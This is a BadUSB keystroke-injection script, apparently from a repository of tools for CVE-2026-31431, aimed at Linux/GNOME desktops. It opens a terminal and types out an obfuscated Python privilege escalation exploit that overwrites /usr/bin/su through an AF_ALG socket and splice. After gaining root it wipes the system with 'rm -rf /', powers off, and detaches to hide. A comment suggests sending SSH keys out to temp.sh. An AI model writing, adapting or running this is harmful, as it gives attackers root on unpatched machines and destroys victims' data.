CVE-2026-31431-tools/badusb/CVE-2026-31431-typed.txt

REM This is BadUSB demo script for Linux/Gnome
REM #############################
REM ####### DANGER !! ###########
REM #############################
REM This script will wipe a linux machine unpatched to CVE-2026-31431
REM launch via GUI evokes terminal through 2 methods then runs attack and wipes root with rm rf

REM GUI launch terminal in kde gnome plasma
DELAY 500
GUI
STRING terminal
ENTER
DELAY 500

REM launch via hotkeys for terminal
DELAY 500
CTRL-ALT T
DELAY 200
ENTER
ENTER

REM Clear the screen in case some banner was displayed
STRING clear
ENTER

REM Bigger shell script example
STRING cat > /tmp/cve.py << EOF
ENTER

STRING #!/usr/bin/env python3
STRING import os as g,zlib,socket as s
STRING def d(x):return bytes.fromhex(x)
STRING def c(f,t,c):
STRING  a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
STRING  try:u.recv(8+t)
STRING  except:0
STRING f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
STRING while i<len(e):c(f,i,e[i:i+4]);i+=4
STRING g.system("su")
ENTER
STRING EOF
ENTER

REM Run exploit command
STRING python3 /tmp/cve.py
ENTER
DELAY 200

REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/ 
REM clean up after

STRING rm -rf / && poweroff > /dev/null 2>&1 &
ENTER

REM detach from the process and close terminal to hide
DELAY 200
STRING disown
ENTER
DELAY 200
STRING exit
ENTER